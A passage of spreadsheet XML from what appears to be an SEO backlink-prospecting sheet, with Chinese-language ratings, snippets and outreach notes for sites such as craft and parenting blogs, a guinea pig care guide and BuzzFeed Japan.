        <x:v>poplembrancinhas.com.br</x:v>
      </x:c>
      <x:c r="C323" s="19" t="str">
        <x:v>https://poplembrancinhas.com.br</x:v>
      </x:c>
      <x:c r="D323" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E323" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="F323" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G323" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H323" s="19" t="str">
        <x:v>https://poplembrancinhas.com.br/</x:v>
      </x:c>
      <x:c r="I323" s="19" t="str">
        <x:v>Pop Lembrancinhas</x:v>
      </x:c>
      <x:c r="J323" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K323" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L323" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M323" s="19" t="str">
        <x:v>https://poplembrancinhas.com.br/</x:v>
      </x:c>
      <x:c r="N323" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O323" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P323" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q323" s="21" t="str">
        <x:v>Blog com diversas ideias, moldes, passo a passo e dicas sobre lembrancinhas. Pop Lembrancinhas Aniversário Desenhos Lembrancinhas Caixinhas Sacolinhas Enfeites Moldes Pesquisar por: Moldes Moldes de Lobo para Imprimir e Recortar 1 de setembro de 2026 Cultips 0 Os moldes de lobo para imprimir são opções práticas para criar atividades e trabalhos usando diferentes representações desse animal. Moldes Molde de Moto para Imprimir e Recortar 31 de agosto de 2026 Cultips 0 O molde de moto para imprimir é uma ideia para criar atividades e diferentes trabalhos manuais relacionados ao universo das motocicletas. Moldes Molde de Carro de Fórmula 1 para Imprimir e Recortar 30 de agosto de 2026 Cultips 0 O molde de Carro de Fórmula 1 para imprimir é uma alternativa para quem procu</x:v>
      </x:c>
      <x:c r="R323" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S323" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T323" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://poplembrancinhas.com.br</x:v>
      </x:c>
    </x:row>
    <x:row r="324">
      <x:c r="A324" s="18" t="str">
        <x:v>323</x:v>
      </x:c>
      <x:c r="B324" s="19" t="str">
        <x:v>sidsseapalmcooking.com</x:v>
      </x:c>
      <x:c r="C324" s="19" t="str">
        <x:v>https://sidsseapalmcooking.com</x:v>
      </x:c>
      <x:c r="D324" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E324" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="F324" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G324" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H324" s="19" t="str">
        <x:v>https://www.sidsseapalmcooking.com/</x:v>
      </x:c>
      <x:c r="I324" s="19" t="str">
        <x:v>Sid's Sea Palm Cooking</x:v>
      </x:c>
      <x:c r="J324" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K324" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L324" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M324" s="19" t="str">
        <x:v>https://www.sidsseapalmcooking.com/</x:v>
      </x:c>
      <x:c r="N324" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O324" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P324" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q324" s="21" t="str">
        <x:v>A blog about food, recipes and fun. Recipes are from around the world. Sid's Sea Palm Cooking Sid's Sea Palm Cooking If I can't have fun in the kitchen, I don't want to play. Home Appetizers Danish Dishes Recipes X Recipes Sunday, August 30, 2026 Tropical Treats, Gluten Free cookies In: Recipes , Sunday Funday , Sweet Stuff 12:00:00 AM By: Sidsel Munkholm - Author I bake Cookies, pretty much every week and bring them to a farmers' market to sell. I love making and introducing people to my Kitchen Sink Cookies. I don't vary them each time I make them, because people are used to the way they taste. I call them almost gluten-free, mainly because I have no control over the facilities where the oatmeal and almond flour are processed. They're not for true celiacs but</x:v>
      </x:c>
      <x:c r="R324" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S324" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T324" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://sidsseapalmcooking.com</x:v>
      </x:c>
    </x:row>
    <x:row r="325">
      <x:c r="A325" s="18" t="str">
        <x:v>324</x:v>
      </x:c>
      <x:c r="B325" s="19" t="str">
        <x:v>woodlandoakskidministry.com</x:v>
      </x:c>
      <x:c r="C325" s="19" t="str">
        <x:v>https://woodlandoakskidministry.com</x:v>
      </x:c>
      <x:c r="D325" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E325" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="F325" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G325" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H325" s="19" t="str">
        <x:v>https://www.woodlandoakskidministry.com/</x:v>
      </x:c>
      <x:c r="I325" s="19" t="str">
        <x:v>WOODLAND OAKS KIDS MINISTRY - Home</x:v>
      </x:c>
      <x:c r="J325" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K325" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L325" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M325" s="19" t="str">
        <x:v>https://www.woodlandoakskidministry.com/</x:v>
      </x:c>
      <x:c r="N325" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O325" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P325" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q325" s="21" t="str">
        <x:v>Woodland Oaks Vacation Bible School The Woodlands, TX WOODLAND OAKS KIDS MINISTRY - Home Home Education Old Testament New Testament Topical Units &gt; Armor of God Blog Contact Welcome to the Woodland Oaks Children's Ministry Website! Our Children's Ministry program is for Children from Birth to the Completion of 6th Grade. ​ Our Mission is To: 1. Partner with Parents to help our children learn about God's Word, how to follow it in our daily lives, and learn the importance of following the Gospel and how to follow His commandments in order to become a Christian. ​2. Learn the importance and blessing of a church family. ​ 3. Learn to serve others. Bible Classes for Children Our Children's Bible Classes take place on: Sunday Mornings- 9:00-9:45 AM W</x:v>
      </x:c>
      <x:c r="R325" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S325" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T325" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://woodlandoakskidministry.com</x:v>
      </x:c>
    </x:row>
    <x:row r="326">
      <x:c r="A326" s="18" t="str">
        <x:v>325</x:v>
      </x:c>
      <x:c r="B326" s="19" t="str">
        <x:v>savingtalents.com</x:v>
      </x:c>
      <x:c r="C326" s="19" t="str">
        <x:v>https://savingtalents.com</x:v>
      </x:c>
      <x:c r="D326" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E326" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="F326" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G326" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H326" s="19" t="str">
        <x:v>https://savingtalents.com/</x:v>
      </x:c>
      <x:c r="I326" s="19" t="str">
        <x:v>Saving Talents | Save time, money, &amp; self with God-given talents.</x:v>
      </x:c>
      <x:c r="J326" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K326" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L326" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M326" s="19" t="str">
        <x:v>https://savingtalents.com/</x:v>
      </x:c>
      <x:c r="N326" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O326" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P326" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q326" s="21" t="str">
        <x:v>Christian and homeschool lifestyle blog. Members of The Church of Jesus Christ of Latter-day Saints. Free Come Follow Me resources for kids. Saving Talents | Save time, money, &amp; self with God-given talents. Skip to content Home Come Follow Me Faith Family Finances Learning Home Life Links on this website may be affiliate links. We're an Amazon affiliate, which means we receive a small compensation for purchases you make through our links at no extra cost to you. Search for: Links on this website may be affiliate links. We're an Amazon affiliate, which means we receive a small compensation purchases you make through our links at no extra cost to you. Some of Our Favorite Posts Delicious &amp; Easy Cheesy Funeral Potatoes with a Secret Ingredient Cheesy potatoes are an easy side dish that can be made for potlucks, funerals, and almost </x:v>
      </x:c>
      <x:c r="R326" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S326" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T326" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://savingtalents.com</x:v>
      </x:c>
    </x:row>
    <x:row r="327">
      <x:c r="A327" s="18" t="str">
        <x:v>326</x:v>
      </x:c>
      <x:c r="B327" s="19" t="str">
        <x:v>motherhoodmanaged.com</x:v>
      </x:c>
      <x:c r="C327" s="19" t="str">
        <x:v>https://motherhoodmanaged.com</x:v>
      </x:c>
      <x:c r="D327" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E327" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="F327" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G327" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H327" s="19" t="str">
        <x:v>https://www.motherhoodmanaged.com/</x:v>
      </x:c>
      <x:c r="I327" s="19" t="str">
        <x:v>Motherhood Managed | Real-Life Help for Moms</x:v>
      </x:c>
      <x:c r="J327" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K327" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L327" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M327" s="19" t="str">
        <x:v>https://www.motherhoodmanaged.com/</x:v>
      </x:c>
      <x:c r="N327" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O327" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P327" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q327" s="21" t="str">
        <x:v>Simple crafts, seasonal activities, and real-life tips for moms in the everyday chaos. Free printables and practical ideas the whole family can use! Motherhood Managed | Real-Life Help for Moms Skip to content ✦ Subscribe for new activities + printables straight to your inbox! Access My Free Printables Vault! Motherhood Managed Home Blog About The Little Years Login Kids Activities CRAFTS SENSORY PLAY SENSORY BINS INDOOR ACTIVITIES OUTDOOR ACTIVITIES LEARNING ACTIVITIES TODDLER ACTIVITIES PRESCHOOL ACTIVITIES Printables FALL PRINTABLES HALLOWEEN PRINTABLES THANKSGIVING PRINTABLES CHRISTMAS PRINTABLES ACTIVITY PRINTABLES LEARNING PRINTABLES Seasonal FALL HALLOWEEN THANKSGIVING CHRISTMAS WINTER The Little Years Sign Up! The Little Years Login Member Home Access my FREE Printables Library! Motherhood Managed Motherhood Managed Fall Activiti</x:v>
      </x:c>
      <x:c r="R327" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S327" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T327" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://motherhoodmanaged.com</x:v>
      </x:c>
    </x:row>
    <x:row r="328">
      <x:c r="A328" s="18" t="str">
        <x:v>327</x:v>
      </x:c>
      <x:c r="B328" s="19" t="str">
        <x:v>wellrootedmotherhood.com</x:v>
      </x:c>
      <x:c r="C328" s="19" t="str">
        <x:v>https://wellrootedmotherhood.com</x:v>
      </x:c>
      <x:c r="D328" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E328" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="F328" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G328" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H328" s="19" t="str">
        <x:v>https://www.wellrootedmotherhood.com/</x:v>
      </x:c>
      <x:c r="I328" s="19" t="str">
        <x:v>Well-Rooted Motherhood</x:v>
      </x:c>
      <x:c r="J328" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K328" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L328" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M328" s="19" t="str">
        <x:v>https://www.wellrootedmotherhood.com/</x:v>
      </x:c>
      <x:c r="N328" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O328" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P328" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q328" s="21" t="str">
        <x:v>Well-Rooted Motherhood is a lifestyle blog for modern moms focused on simplifying home and family life through seasonal living, realistic routines, and intentional motherhood. Discover easy homemaking systems, calm daily rhythms, family routines, nostalgic activities for kids, and practical ways to reduce overwhelm and support mental wellness—without pressure or overcomplicating everyday life. Well-Rooted Motherhood Skip to Content Open Menu Close Menu Well-Rooted Motherhood The Blog The Latest All Blog Posts Start Here Motherhood &amp; Family Wellness Homemaking Seasonal Lifestyle Favorites Friday Favorites Favorite Things Freebies Free Guides &amp; Workbooks NEWSLETTER SIGNUP | FREE MEMBER Heart + Home Email Course Shop Amazon Storefront The WRM Shop Shopping Guides More About Substack: Rooted Letters Contact Disclaimer Archives Login Account 0 0 Subscribe Well-Rooted Motherhood The Blog The Latest All Blog Posts Start Here Motherhood &amp; Family Wellness Homemaking Seasonal Lifestyle Favorites Friday Favorites Favorite Things Freebies Free Guides &amp; Workbooks NEWSLETTER SIGNUP | FREE MEMBE</x:v>
      </x:c>
      <x:c r="R328" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S328" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T328" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://wellrootedmotherhood.com</x:v>
      </x:c>
    </x:row>
    <x:row r="329">
      <x:c r="A329" s="18" t="str">
        <x:v>328</x:v>
      </x:c>
      <x:c r="B329" s="19" t="str">
        <x:v>thepetiteplanner.com</x:v>
      </x:c>
      <x:c r="C329" s="19" t="str">
        <x:v>https://thepetiteplanner.com</x:v>
      </x:c>
      <x:c r="D329" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E329" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="F329" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G329" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H329" s="19" t="str">
        <x:v>https://thepetiteplanner.com/</x:v>
      </x:c>
      <x:c r="I329" s="19" t="str">
        <x:v>The Petite Planner ⋆ The Petite Planner</x:v>
      </x:c>
      <x:c r="J329" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K329" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L329" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M329" s="19" t="str">
        <x:v>https://thepetiteplanner.com/</x:v>
      </x:c>
      <x:c r="N329" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O329" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P329" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q329" s="21" t="str">
        <x:v>The Petite Planner ⋆ The Petite Planner bullet journal shop Home About Privacy Policy Disclosure Terms and Conditions Get In Touch e-club Resources (VIP) &amp;uarr; Search... Home Journaling Spread Ideas &amp; Tutorials Supplies Free Printables Daily Life Doodles Printables Shop Checkout Favorite Supplies Courses About Terms and Conditions Disclosure Skip to primary navigation Skip to main content Skip to footer The Petite Planner Bullet Journal, Printables &amp; Doodles Bullet Journal Spread Ideas &amp; Tutorials Supplies Journaling Doodles Printables Shop Checkout Supplies Courses Printables Courses Journal Shop Favorites join the e-club! Get the latest updates and resources in your inbox! September Doodl</x:v>
      </x:c>
      <x:c r="R329" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S329" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T329" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thepetiteplanner.com</x:v>
      </x:c>
    </x:row>
    <x:row r="330">
      <x:c r="A330" s="18" t="str">
        <x:v>329</x:v>
      </x:c>
      <x:c r="B330" s="19" t="str">
        <x:v>makingcraftythings.com</x:v>
      </x:c>
      <x:c r="C330" s="19" t="str">
        <x:v>https://makingcraftythings.com</x:v>
      </x:c>
      <x:c r="D330" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E330" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="F330" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G330" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H330" s="19" t="str">
        <x:v>https://makingcraftythings.com/</x:v>
      </x:c>
      <x:c r="I330" s="19" t="str">
        <x:v>Home</x:v>
      </x:c>
      <x:c r="J330" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K330" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L330" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M330" s="19" t="str">
        <x:v>https://makingcraftythings.com/</x:v>
      </x:c>
      <x:c r="N330" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O330" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P330" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q330" s="21" t="str">
        <x:v>Home Skip to content WE'RE PASSIONATE ABOUT HELPING CRAFTERS OF ALL AGES CREATE Search SHOP ETSY Cricut Cricut Cheat Sheet Book Best Cricut Machine Guide Cricut Crafts Crafts by Theme Bible Crafts Birthday Crafts Christmas Crafts Easter Crafts Fall Crafts Father’s Day Mother’s Day School Crafts for Kids Spring Crafts Summer Crafts Thanksgiving Winter Crafts Valentine Crafts Gift Ideas Crafts by Type Vinyl Crafts Paper Crafts DIY Home, Bath &amp; Body Fabric Crafts Crochet Heat Press Crafts Crafts for Kids Crafts by Age Crafts for Adults Crafts for Seniors Crafts for Kids Crafts for Preschoolers Crafts for Toddlers Crafts for Kids Handprint Crafts Paper Plate Crafts Paper Bag Crafts Paper Crafts </x:v>
      </x:c>
      <x:c r="R330" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S330" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T330" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://makingcraftythings.com</x:v>
      </x:c>
    </x:row>
    <x:row r="331">
      <x:c r="A331" s="18" t="str">
        <x:v>330</x:v>
      </x:c>
      <x:c r="B331" s="19" t="str">
        <x:v>guinealynx.info</x:v>
      </x:c>
      <x:c r="C331" s="19" t="str">
        <x:v>https://guinealynx.info</x:v>
      </x:c>
      <x:c r="D331" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E331" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="F331" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G331" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H331" s="19" t="str">
        <x:v>https://guinealynx.info/</x:v>
      </x:c>
      <x:c r="I331" s="19" t="str">
        <x:v>Guinea Lynx ::</x:v>
      </x:c>
      <x:c r="J331" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K331" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L331" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M331" s="19" t="str">
        <x:v>https://guinealynx.info/</x:v>
      </x:c>
      <x:c r="N331" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O331" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P331" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q331" s="21" t="str">
        <x:v>A comprehensive medical and care guide for the care of guinea pigs. Guinea Lynx :: FORUMS SITEMAP INDEX CARE GUIDE Diet Housing MEDICAL GUIDE EMERGENCY Finding a Vet Hand Feeding Surgery MEDICATIONS Dangerous Medications Antibiotics MEDICAL REFERENCE Bladder Stones Eyes Fungus Hair Loss Heart Lumps Mites Teeth MORE TOPICS ... Need the Basics? Start with the CARE GUIDE - Raising a Healthy Guinea Pig . Is your guinea pig ill? Consult the EMERGENCY MEDICAL GUIDE for Signs of Illness. Looking for a pet? Do it the right way and Adopt a Rescued Guinea Pig! Many people are unaware there are homeless guinea pigs. Make a difference and adopt! In The News... New FUN Page! Fun for your guinea pigs and fun for you! Cage accessories, houses, &amp; cozies! Read more... Guinea</x:v>
      </x:c>
      <x:c r="R331" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S331" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T331" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://guinealynx.info</x:v>
      </x:c>
    </x:row>
    <x:row r="332">
      <x:c r="A332" s="18" t="str">
        <x:v>331</x:v>
      </x:c>
      <x:c r="B332" s="19" t="str">
        <x:v>paperscissorscraft.com</x:v>
      </x:c>
      <x:c r="C332" s="19" t="str">
        <x:v>https://paperscissorscraft.com</x:v>
      </x:c>
      <x:c r="D332" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E332" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="F332" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G332" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H332" s="19" t="str">
        <x:v>https://www.paperscissorscraft.com/</x:v>
      </x:c>
      <x:c r="I332" s="19" t="str">
        <x:v>Home - Paper Scissors Craft | Kids Crafts and Activities</x:v>
      </x:c>
      <x:c r="J332" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K332" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L332" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M332" s="19" t="str">
        <x:v>https://www.paperscissorscraft.com/</x:v>
      </x:c>
      <x:c r="N332" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O332" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P332" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q332" s="21" t="str">
        <x:v>Kids and toddler diy, easy, and quick crafts and outdoor, indoor, seasonal, and learning activities. Paper Scissors Crafts Home - Paper Scissors Craft | Kids Crafts and Activities Skip to content paperscissorscraftblog@gmail.com About Me Craft Box Shop Local Events and Activities Bible Activities Christian Coloring Pages Faith and Prayer Activities Sunday School Seasonal Activities New Year’s Valentine’s Day St. Patrick’s Day Easter Mother’s Day 4th of July Halloween Thanksgiving Christmas Search for: Bible Activities Christian Coloring Pages Faith and Prayer Activities Sunday School Seasonal Activities New Year’s Valentine’s Day St. Patrick’s Day Easter Mother’s Day 4th of July Halloween Thanksgiving Christmas Search for: Home | Paper Scissors Craft Paper Scissors Craft 2026-05-30T00:51:24-05:00 What’s on Your </x:v>
      </x:c>
      <x:c r="R332" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S332" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T332" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://paperscissorscraft.com</x:v>
      </x:c>
    </x:row>
    <x:row r="333">
      <x:c r="A333" s="18" t="str">
        <x:v>332</x:v>
      </x:c>
      <x:c r="B333" s="19" t="str">
        <x:v>buzzfeed.com</x:v>
      </x:c>
      <x:c r="C333" s="19" t="str">
        <x:v>https://buzzfeed.com</x:v>
      </x:c>
      <x:c r="D333" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E333" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="F333" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G333" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H333" s="19" t="str">
        <x:v>https://www.buzzfeed.com/jp</x:v>
      </x:c>
      <x:c r="I333" s="19" t="str">
        <x:v>BuzzFeed - バズフィードジャパン</x:v>
      </x:c>
      <x:c r="J333" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K333" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L333" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M333" s="19" t="str">
        <x:v>https://www.buzzfeed.com/jp</x:v>
      </x:c>
      <x:c r="N333" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O333" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P333" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q333" s="21" t="str">
        <x:v>BuzzFeed Japanは、エンタメ、グルメ、買い物、動物など、思わず誰かにシェアしたくなる話題や情報をお届けします。 BuzzFeed - バズフィードジャパン スキップ News お買い物 エンタメ Kawaii Tasty 動画 未知 News お買い物 エンタメ Kawaii Tasty 動画 未知 ログイン Browse links 会社情報 会社情報 Investor Relations 採用情報 Merch Edition US UK Australia Canada Deutschland India Japan Latam US residents can opt out of "sales" of personal data. Do Not Sell or Share My Personal Information Privacy Settings Privacy Settings © 2026 BuzzFeed, Inc プレスリリース RSS プライバシーポリシー Consent Preferences ユーザー規約 Ad Choices Help お問い合わせ Sitemap Search, watch, and cook every single Tasty recipe and video ever - all in one place! News, Politics, Culture, Life, Entertainment, and more. Stories that matter to you. BuzzFeedホーム 「明日声が出なくなったら…」大塚剛央×阿座上洋平が、日本語吹替で演じた“恋に落ちる氷上のライバル”と“声優のキャリア”の共通点【ヒーテッド・</x:v>
      </x:c>
      <x:c r="R333" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S333" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T333" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://buzzfeed.com</x:v>
      </x:c>
    </x:row>
    <x:row r="334">
      <x:c r="A334" s="18" t="str">
        <x:v>333</x:v>
      </x:c>
      <x:c r="B334" s="19" t="str">
        <x:v>twinsmommy.com</x:v>
      </x:c>
      <x:c r="C334" s="19" t="str">
        <x:v>https://twinsmommy.com</x:v>
      </x:c>
      <x:c r="D334" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E334" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F334" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G334" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H334" s="19" t="str">
        <x:v>https://twinsmommy.com/</x:v>
      </x:c>
      <x:c r="I334" s="19" t="str">
        <x:v>Twins Mommy – Learn to Start a Mom Blog</x:v>
      </x:c>
      <x:c r="J334" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K334" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L334" s="19" t="str">
